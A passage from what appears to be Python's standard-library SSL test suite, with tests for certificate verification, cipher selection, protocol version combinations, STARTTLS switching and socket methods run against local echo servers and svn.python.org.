s.close()
# Same with a server hostname
s = ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname="svn.python.org")
if ssl.HAS_SNI:
s.connect(("svn.python.org", 443))
s.close()
else:
self.assertRaises(ValueError, s.connect, ("svn.python.org", 443))
# This should fail because we have no verification certs
ctx.verify_mode = ssl.CERT_REQUIRED
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, ("svn.python.org", 443))
s.close()
# This should succeed because we specify the root cert
ctx.load_verify_locations(SVN_PYTHON_ORG_ROOT_CERT)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect(("svn.python.org", 443))
try:
cert = s.getpeercert()
self.assertTrue(cert)
finally:
s.close()
def test_connect_capath(self):
# Verify server certificates using the `capath` argument
# NOTE: the subject hashing algorithm has been changed between
# OpenSSL 0.9.8n and 1.0.0, as a result the capath directory must
# contain both versions of each certificate (same content, different
# filename) for this test to be portable across OpenSSL releases.
with support.transient_internet("svn.python.org"):
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=CAPATH)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect(("svn.python.org", 443))
try:
cert = s.getpeercert()
self.assertTrue(cert)
finally:
s.close()
# Same with a bytes `capath` argument
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=BYTES_CAPATH)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect(("svn.python.org", 443))
try:
cert = s.getpeercert()
self.assertTrue(cert)
finally:
s.close()
@unittest.skipIf(os.name == "nt", "Can't use a socket as a file under Windows")
def test_makefile_close(self):
# Issue #5238: creating a file-like object with makefile() shouldn't
# delay closing the underlying "real socket" (here tested with its
# file descriptor, hence skipping the test under Windows).
with support.transient_internet("svn.python.org"):
ss = ssl.wrap_socket(socket.socket(socket.AF_INET))
ss.connect(("svn.python.org", 443))
fd = ss.fileno()
f = ss.makefile()
f.close()
# The fd is still open
os.read(fd, 0)
# Closing the SSL socket should close the fd too
ss.close()
gc.collect()
with self.assertRaises(OSError) as e:
os.read(fd, 0)
self.assertEqual(e.exception.errno, errno.EBADF)
def test_non_blocking_handshake(self):
with support.transient_internet("svn.python.org"):
s = socket.socket(socket.AF_INET)
s.connect(("svn.python.org", 443))
s.setblocking(False)
s = ssl.wrap_socket(s,
cert_reqs=ssl.CERT_NONE,
do_handshake_on_connect=False)
count = 0
while True:
try:
count += 1
s.do_handshake()
break
except ssl.SSLError as err:
if err.args[0] == ssl.SSL_ERROR_WANT_READ:
select.select([s], [], [])
elif err.args[0] == ssl.SSL_ERROR_WANT_WRITE:
select.select([], [s], [])
else:
raise
s.close()
if support.verbose:
sys.stdout.write("\nNeeded %d calls to do_handshake() to establish session.\n" % count)
def test_get_server_certificate(self):
with support.transient_internet("svn.python.org"):
pem = ssl.get_server_certificate(("svn.python.org", 443))
if not pem:
self.fail("No server certificate on svn.python.org:443!")
try:
pem = ssl.get_server_certificate(("svn.python.org", 443), ca_certs=CERTFILE)
except ssl.SSLError as x:
#should fail
if support.verbose:
sys.stdout.write("%s\n" % x)
else:
self.fail("Got server certificate %s for svn.python.org!" % pem)
pem = ssl.get_server_certificate(("svn.python.org", 443), ca_certs=SVN_PYTHON_ORG_ROOT_CERT)
if not pem:
self.fail("No server certificate on svn.python.org:443!")
if support.verbose:
sys.stdout.write("\nVerified certificate for svn.python.org:443 is\n%s\n" % pem)
def test_ciphers(self):
remote = ("svn.python.org", 443)
with support.transient_internet(remote[0]):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="ALL")
s.connect(remote)
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="DEFAULT")
s.connect(remote)
# Error checking can happen at instantiation or when connecting
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
with socket.socket(socket.AF_INET) as sock:
s = ssl.wrap_socket(sock,
cert_reqs=ssl.CERT_NONE, ciphers="^$:,;?*'dorothyx")
s.connect(remote)
def test_algorithms(self):
# Issue #8484: all algorithms should be available when verifying a
# certificate.
# SHA256 was added in OpenSSL 0.9.8
if ssl.OPENSSL_VERSION_INFO < (0, 9, 8, 0, 15):
self.skipTest("SHA256 not available on %r" % ssl.OPENSSL_VERSION)
# sha256.tbs-internet.com needs SNI to use the correct certificate
if not ssl.HAS_SNI:
self.skipTest("SNI needed for this test")
# https://sha2.hboeck.de/ was used until 2011-01-08 (no route to host)
remote = ("sha256.tbs-internet.com", 443)
sha256_cert = os.path.join(os.path.dirname(__file__), "sha256.pem")
with support.transient_internet("sha256.tbs-internet.com"):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(sha256_cert)
s = ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname="sha256.tbs-internet.com")
try:
s.connect(remote)
if support.verbose:
sys.stdout.write("\nCipher with %r is %r\n" %
(remote, s.cipher()))
sys.stdout.write("Certificate is:\n%s\n" %
pprint.pformat(s.getpeercert()))
finally:
s.close()
try:
import threading
except ImportError:
_have_threads = False
else:
_have_threads = True
from test.ssl_servers import make_https_server
class ThreadedEchoServer(threading.Thread):
class ConnectionHandler(threading.Thread):
"""A mildly complicated class, because we want it to work both
with and without the SSL wrapper around the socket connection, so
that we can test the STARTTLS functionality."""
def __init__(self, server, connsock, addr):
self.server = server
self.running = False
self.sock = connsock
self.addr = addr
self.sock.setblocking(1)
self.sslconn = None
threading.Thread.__init__(self)
self.daemon = True
def wrap_conn(self):
try:
self.sslconn = self.server.context.wrap_socket(
self.sock, server_side=True)
except (ssl.SSLError, socket.error) as e:
# Treat ECONNRESET as though it were an SSLError - OpenSSL
# on Ubuntu abruptly closes the connection when asked to use
# an unsupported protocol.
if (not isinstance(e, ssl.SSLError) and
e.errno != errno.ECONNRESET):
raise
# XXX Various errors can have happened here, for example
# a mismatching protocol version, an invalid certificate,
# or a low-level bug. This should be made more discriminating.
self.server.conn_errors.append(e)
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.server.stop()
self.close()
return False
else:
if self.server.context.verify_mode == ssl.CERT_REQUIRED:
cert = self.sslconn.getpeercert()
if support.verbose and self.server.chatty:
sys.stdout.write(" client cert is " + pprint.pformat(cert) + "\n")
cert_binary = self.sslconn.getpeercert(True)
if support.verbose and self.server.chatty:
sys.stdout.write(" cert binary is " + str(len(cert_binary)) + " bytes\n")
cipher = self.sslconn.cipher()
if support.verbose and self.server.chatty:
sys.stdout.write(" server: connection cipher is now " + str(cipher) + "\n")
return True
def read(self):
if self.sslconn:
return self.sslconn.read()
else:
return self.sock.recv(1024)
def write(self, bytes):
if self.sslconn:
return self.sslconn.write(bytes)
else:
return self.sock.send(bytes)
def close(self):
if self.sslconn:
self.sslconn.close()
else:
self.sock.close()
def run(self):
self.running = True
if not self.server.starttls_server:
if not self.wrap_conn():
return
while self.running:
try:
msg = self.read()
stripped = msg.strip()
if not stripped:
# eof, so quit this handler
self.running = False
self.close()
elif stripped == b'over':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: client closed connection\n")
self.close()
return
elif (self.server.starttls_server and
stripped == b'STARTTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read STARTTLS from client, sending OK...\n")
self.write(b"OK\n")
if not self.wrap_conn():
return
elif (self.server.starttls_server and self.sslconn
and stripped == b'ENDTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read ENDTLS from client, sending OK...\n")
self.write(b"OK\n")
self.sock = self.sslconn.unwrap()
self.sslconn = None
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: connection is now unencrypted...\n")
else:
if (support.verbose and
self.server.connectionchatty):
ctype = (self.sslconn and "encrypted") or "unencrypted"
sys.stdout.write(" server: read %r (%s), sending back %r (%s)...\n"
% (msg, ctype, msg.lower(), ctype))
self.write(msg.lower())
except socket.error:
if self.server.chatty:
handle_error("Test server failure:\n")
self.close()
self.running = False
# normally, we'd just stop here, but for the test
# harness, we want to stop the server
self.server.stop()
def __init__(self, certificate=None, ssl_version=None,
certreqs=None, cacerts=None,
chatty=True, connectionchatty=False, starttls_server=False,
ciphers=None, context=None):
if context:
self.context = context
else:
self.context = ssl.SSLContext(ssl_version
if ssl_version is not None
else ssl.PROTOCOL_TLSv1)
self.context.verify_mode = (certreqs if certreqs is not None
else ssl.CERT_NONE)
if cacerts:
self.context.load_verify_locations(cacerts)
if certificate:
self.context.load_cert_chain(certificate)
if ciphers:
self.context.set_ciphers(ciphers)
self.chatty = chatty
self.connectionchatty = connectionchatty
self.starttls_server = starttls_server
self.sock = socket.socket()
self.port = support.bind_port(self.sock)
self.flag = None
self.active = False
self.conn_errors = []
threading.Thread.__init__(self)
self.daemon = True
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
self.stop()
self.join()
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.sock.settimeout(0.05)
self.sock.listen(5)
self.active = True
if self.flag:
# signal an event
self.flag.set()
while self.active:
try:
newconn, connaddr = self.sock.accept()
if support.verbose and self.chatty:
sys.stdout.write(' server: new connection from '
+ repr(connaddr) + '\n')
handler = self.ConnectionHandler(self, newconn, connaddr)
handler.start()
handler.join()
except socket.timeout:
pass
except KeyboardInterrupt:
self.stop()
self.sock.close()
def stop(self):
self.active = False
class AsyncoreEchoServer(threading.Thread):
# this one's based on asyncore.dispatcher
class EchoServer (asyncore.dispatcher):
class ConnectionHandler (asyncore.dispatcher_with_send):
def __init__(self, conn, certfile):
self.socket = ssl.wrap_socket(conn, server_side=True,
certfile=certfile,
do_handshake_on_connect=False)
asyncore.dispatcher_with_send.__init__(self, self.socket)
self._ssl_accepting = True
self._do_ssl_handshake()
def readable(self):
if isinstance(self.socket, ssl.SSLSocket):
while self.socket.pending() > 0:
self.handle_read_event()
return True
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except ssl.SSLError as err:
if err.args[0] in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return
elif err.args[0] == ssl.SSL_ERROR_EOF:
return self.handle_close()
raise
except socket.error as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def handle_read(self):
if self._ssl_accepting:
self._do_ssl_handshake()
else:
data = self.recv(1024)
if support.verbose:
sys.stdout.write(" server: read %s from client\n" % repr(data))
if not data:
self.close()
else:
self.send(data.lower())
def handle_close(self):
self.close()
if support.verbose:
sys.stdout.write(" server: closed connection %s\n" % self.socket)
def handle_error(self):
raise
def __init__(self, certfile):
self.certfile = certfile
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(sock, '')
asyncore.dispatcher.__init__(self, sock)
self.listen(5)
def handle_accepted(self, sock_obj, addr):
if support.verbose:
sys.stdout.write(" server: new connection from %s:%s\n" %addr)
self.ConnectionHandler(sock_obj, self.certfile)
def handle_error(self):
raise
def __init__(self, certfile):
self.flag = None
self.active = False
self.server = self.EchoServer(certfile)
self.port = self.server.port
threading.Thread.__init__(self)
self.daemon = True
def __str__(self):
return "<%s %s>" % (self.__class__.__name__, self.server)
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
if support.verbose:
sys.stdout.write(" cleanup: stopping server.\n")
self.stop()
if support.verbose:
sys.stdout.write(" cleanup: joining server thread.\n")
self.join()
if support.verbose:
sys.stdout.write(" cleanup: successfully joined.\n")
def start (self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.active = True
if self.flag:
self.flag.set()
while self.active:
try:
asyncore.loop(1)
except:
pass
def stop(self):
self.active = False
self.server.close()
def bad_cert_test(certfile):
"""
Launch a server with CERT_REQUIRED, and check that trying to
connect to it with the given client certificate fails.
"""
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_REQUIRED,
cacerts=CERTFILE, chatty=False,
connectionchatty=False)
with server:
try:
with socket.socket() as sock:
s = ssl.wrap_socket(sock,
certfile=certfile,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
except ssl.SSLError as x:
if support.verbose:
sys.stdout.write("\nSSLError is %s\n" % x.args[1])
except socket.error as x:
if support.verbose:
sys.stdout.write("\nsocket.error is %s\n" % x.args[1])
except IOError as x:
if x.errno != errno.ENOENT:
raise
if support.verbose:
sys.stdout.write("\IOError is %s\n" % str(x))
else:
raise AssertionError("Use of invalid cert should have failed!")
def server_params_test(client_context, server_context, indata=b"FOO\n",
chatty=True, connectionchatty=False):
"""
Launch a server, connect a client to it and try various reads
and writes.
"""
server = ThreadedEchoServer(context=server_context,
chatty=chatty,
connectionchatty=False)
with server:
with client_context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
for arg in [indata, bytearray(indata), memoryview(indata)]:
if connectionchatty:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(arg)
outdata = s.read()
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
raise AssertionError(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
s.close()
def try_protocol_combo(server_protocol, client_protocol, expect_success,
certsreqs=None, server_options=0, client_options=0):
if certsreqs is None:
certsreqs = ssl.CERT_NONE
certtype = {
ssl.CERT_NONE: "CERT_NONE",
ssl.CERT_OPTIONAL: "CERT_OPTIONAL",
ssl.CERT_REQUIRED: "CERT_REQUIRED",
}[certsreqs]
if support.verbose:
formatstr = (expect_success and " %s->%s %s\n") or " {%s->%s} %s\n"
sys.stdout.write(formatstr %
(ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol),
certtype))
client_context = ssl.SSLContext(client_protocol)
client_context.options = ssl.OP_ALL | client_options
server_context = ssl.SSLContext(server_protocol)
server_context.options = ssl.OP_ALL | server_options
for ctx in (client_context, server_context):
ctx.verify_mode = certsreqs
# NOTE: we must enable "ALL" ciphers, otherwise an SSLv23 client
# will send an SSLv3 hello (rather than SSLv2) starting from
# OpenSSL 1.0.0 (see issue #8322).
ctx.set_ciphers("ALL")
ctx.load_cert_chain(CERTFILE)
ctx.load_verify_locations(CERTFILE)
try:
server_params_test(client_context, server_context,
chatty=False, connectionchatty=False)
# Protocol mismatch can result in either an SSLError, or a
# "Connection reset by peer" error.
except ssl.SSLError:
if expect_success:
raise
except socket.error as e:
if expect_success or e.errno != errno.ECONNRESET:
raise
else:
if not expect_success:
raise AssertionError(
"Client protocol %s succeeded with server protocol %s!"
% (ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol)))
class ThreadedTests(unittest.TestCase):
@skip_if_broken_ubuntu_ssl
def test_echo(self):
"""Basic test of an SSL client connecting to a server"""
if support.verbose:
sys.stdout.write("\n")
for protocol in PROTOCOLS:
context = ssl.SSLContext(protocol)
context.load_cert_chain(CERTFILE)
server_params_test(context, context,
chatty=True, connectionchatty=True)
def test_getpeercert(self):
if support.verbose:
sys.stdout.write("\n")
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
s = context.wrap_socket(socket.socket())
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()
if support.verbose:
sys.stdout.write(pprint.pformat(cert) + '\n')
sys.stdout.write("Connection cipher is " + str(cipher) + '.\n')
if 'subject' not in cert:
self.fail("No subject field in certificate: %s." %
pprint.pformat(cert))
if ((('organizationName', 'Python Software Foundation'),)
not in cert['subject']):
self.fail(
"Missing or invalid 'organizationName' field in certificate subject; "
"should be 'Python Software Foundation'.")
self.assertIn('notBefore', cert)
self.assertIn('notAfter', cert)
before = ssl.cert_time_to_seconds(cert['notBefore'])
after = ssl.cert_time_to_seconds(cert['notAfter'])
self.assertLess(before, after)
s.close()
def test_empty_cert(self):
"""Connecting with an empty cert file"""
bad_cert_test(os.path.join(os.path.dirname(__file__) or os.curdir,
"nullcert.pem"))
def test_malformed_cert(self):
"""Connecting with a badly formatted certificate (syntax error)"""
bad_cert_test(os.path.join(os.path.dirname(__file__) or os.curdir,
"badcert.pem"))
def test_nonexisting_cert(self):
"""Connecting with a non-existing cert file"""
bad_cert_test(os.path.join(os.path.dirname(__file__) or os.curdir,
"wrongcert.pem"))
def test_malformed_key(self):
"""Connecting with a badly formatted key (syntax error)"""
bad_cert_test(os.path.join(os.path.dirname(__file__) or os.curdir,
"badkey.pem"))
def test_rude_shutdown(self):
"""A brutal shutdown of an SSL server should raise an IOError
in the client when attempting handshake.
"""
listener_ready = threading.Event()
listener_gone = threading.Event()
s = socket.socket()
port = support.bind_port(s, HOST)
# `listener` runs in a thread. It sits in an accept() until
# the main thread connects. Then it rudely closes the socket,
# and sets Event `listener_gone` to let the main thread know
# the socket is gone.
def listener():
s.listen(5)
listener_ready.set()
newsock, addr = s.accept()
newsock.close()
s.close()
listener_gone.set()
def connector():
listener_ready.wait()
with socket.socket() as c:
c.connect((HOST, port))
listener_gone.wait()
try:
ssl_sock = ssl.wrap_socket(c)
except IOError:
pass
else:
self.fail('connecting to closed SSL socket should have failed')
t = threading.Thread(target=listener)
t.start()
try:
connector()
finally:
t.join()
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv2'), "need SSLv2")
def test_protocol_sslv2(self):
"""Connecting to an SSLv2 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, True)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLSv1, False)
# SSLv23 client with specific SSL options
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv2)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, True,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, True,
client_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
def test_protocol_sslv23(self):
"""Connecting to an SSLv23 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try:
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv2, True)
except (ssl.SSLError, socket.error) as x:
# this fails on some older versions of OpenSSL (0.9.7l, for instance)
if support.verbose:
sys.stdout.write(
" SSL2 client to SSL23 server test unexpectedly failed:\n %s\n"
% str(x))
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, True)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, True)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, True, ssl.CERT_REQUIRED)
# Server with specific SSL options
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False,
server_options=ssl.OP_NO_SSLv3)
# Will choose TLSv1
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True,
server_options=ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, False,
server_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
def test_protocol_sslv3(self):
"""Connecting to an SSLv3 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, True)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, True, ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv2, False)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, False)
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv23, True,
client_options=ssl.OP_NO_SSLv2)
@skip_if_broken_ubuntu_ssl
def test_protocol_tlsv1(self):
"""Connecting to a TLSv1 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, True)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, True, ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1)
def test_starttls(self):
"""Switching from clear text to encrypted and back again."""
msgs = (b"msg 1", b"MSG 2", b"STARTTLS", b"MSG 3", b"msg 4", b"ENDTLS", b"msg 5", b"msg 6")
server = ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLSv1,
starttls_server=True,
chatty=True,
connectionchatty=True)
wrapped = False
with server:
s = socket.socket()
s.setblocking(1)
s.connect((HOST, server.port))
if support.verbose:
sys.stdout.write("\n")
for indata in msgs:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
if wrapped:
conn.write(indata)
outdata = conn.read()
else:
s.send(indata)
outdata = s.recv(1024)
msg = outdata.strip().lower()
if indata == b"STARTTLS" and msg.startswith(b"ok"):
# STARTTLS ok, switch to secure mode
if support.verbose:
sys.stdout.write(
" client: read %r from server, starting TLS...\n"
% msg)
conn = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
wrapped = True
elif indata == b"ENDTLS" and msg.startswith(b"ok"):
# ENDTLS ok, switch back to clear text
if support.verbose:
sys.stdout.write(
" client: read %r from server, ending TLS...\n"
% msg)
s = conn.unwrap()
wrapped = False
else:
if support.verbose:
sys.stdout.write(
" client: read %r from server\n" % msg)
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
if wrapped:
conn.write(b"over\n")
else:
s.send(b"over\n")
if wrapped:
conn.close()
else:
s.close()
def test_socketserver(self):
"""Using a SocketServer to create and manage SSL connections."""
server = make_https_server(self, CERTFILE)
# try to connect
if support.verbose:
sys.stdout.write('\n')
with open(CERTFILE, 'rb') as f:
d1 = f.read()
d2 = ''
# now fetch the same data from the HTTPS server
url = 'https://%s:%d/%s' % (
HOST, server.port, os.path.split(CERTFILE)[1])
f = urllib.request.urlopen(url)
try:
dlen = f.info().get("content-length")
if dlen and (int(dlen) > 0):
d2 = f.read(int(dlen))
if support.verbose:
sys.stdout.write(
" client: read %d bytes from remote server '%s'\n"
% (len(d2), server))
finally:
f.close()
self.assertEqual(d1, d2)
def test_asyncore_server(self):
"""Check the example asyncore integration."""
indata = "TEST MESSAGE of mixed case\n"
if support.verbose:
sys.stdout.write("\n")
indata = b"FOO\n"
server = AsyncoreEchoServer(CERTFILE)
with server:
s = ssl.wrap_socket(socket.socket())
s.connect(('127.0.0.1', server.port))
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(indata)
outdata = s.read()
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
self.fail(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
s.close()
if support.verbose:
sys.stdout.write(" client: connection closed.\n")
def test_recv_send(self):
"""Test recv(), send() and friends."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = ssl.wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
# helper methods for standardising recv* method signatures
def _recv_into():
b = bytearray(b"\0"*100)
count = s.recv_into(b)
return b[:count]
def _recvfrom_into():
b = bytearray(b"\0"*100)
count, addr = s.recvfrom_into(b)
return b[:count]
# (name, method, whether to expect success, *args)
send_methods = [
('send', s.send, True, []),
('sendto', s.sendto, False, ["some.address"]),
('sendall', s.sendall, True, []),
]
recv_methods = [
('recv', s.recv, True, []),
('recvfrom', s.recvfrom, False, ["some.address"]),
('recv_into', _recv_into, True, []),
('recvfrom_into', _recvfrom_into, False, []),
]
data_prefix = "PREFIX_"
for meth_name, send_meth, expect_success, args in send_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
send_meth(indata, *args)
outdata = s.read()
if outdata != indata.lower():
self.fail(
"While sending with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to send with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
for meth_name, recv_meth, expect_success, args in recv_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
s.send(indata)
outdata = recv_meth(*args)
if outdata != indata.lower():
self.fail(
"While receiving with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to receive with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
# consume data
s.read()
s.write(b"over\n")
s.close()
def test_handshake_timeout(self):
# Issue #5103: SSL handshake must respect the socket timeout
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
started = threading.Event()
finish = False
def serve():
server.listen(5)
started.set()
conns = []
while not finish:
r, w, e = select.select([server], [], [], 0.1)
if server in r:
# Let the socket hang around rather than having
# it closed by garbage collection.
conns.append(server.accept()[0])
for sock in conns:
sock.close()
t = threading.Thread(target=serve)
t.start()
started.wait()
try:
try:
c = socket.socket(socket.AF_INET)
c.settimeout(0.2)
c.connect((host, port))
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
ssl.wrap_socket, c)
finally:
c.close()
try:
c = socket.socket(socket.AF_INET)
c = ssl.wrap_socket(c)
c.settimeout(0.2)
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
c.connect, (host, port))
finally:
c.close()
finally:
finish = True
t.join()
server.close()
def test_server_accept(self):
# Issue #16357: accept() on a SSLSocket created through
# SSLContext.wrap_socket().
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
